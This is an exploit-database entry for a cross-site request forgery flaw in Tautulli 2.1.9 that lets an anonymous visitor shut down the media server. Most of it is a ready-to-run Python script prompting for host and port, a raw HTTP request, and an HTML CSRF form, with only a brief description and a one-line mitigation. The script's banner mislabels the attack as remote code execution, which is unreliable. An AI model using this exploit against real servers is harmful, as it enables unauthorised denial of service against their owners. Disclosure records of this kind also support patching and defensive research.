Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)

vendor:

Tautulli

by:

Ismail Tasdelen

N/A

CVSS

N/A

Cross-Site Request Forgery (ShutDown)

Cross-Site Request Forgery

CWE

Product Name: Tautulli

Affected Version From: v2.1.9

Affected Version To: v2.1.9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2018

Tautulli 2.1.9 – Cross-Site Request Forgery (ShutDown)

In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has been discovered that anonymous access can be achieved in applications that do not have a user login area and that the remote media server can be shut down.

Mitigation:

Implement user authentication and authorization mechanisms to prevent unauthorized access and actions.

Source

Exploit-DB raw data:

# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulernability Type : Cross-Site Request Forgery (ShutDown)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
# been discovered that anonymous access can be achieved in applications that do
# not have a user login area and that the remote media server can be shut down.

# PoC Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
 _____ __  _  _ _____ _  _ _   _   _   _   _ ___   __  ___
|_   _/  \| || |_   _| || | | | | | | | \ / (_  | /  |/ _ \
  | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
  |_||_||_|\__/  |_|  \__/|___|___|_|   \_/ |___\/ |_\//_/
     Unauthenticated Remote Code Execution
                                   by Ismail Tasdelen
"""

print(icon)

host = input("[+] HOST: ")
port = input("[+] PORT: ")

response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.

if response.status_code == 200:
    print('[✓] Success!')
elif response.status_code != 200:
    print('[✗] Unsuccessful!')
else:
    exit()

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>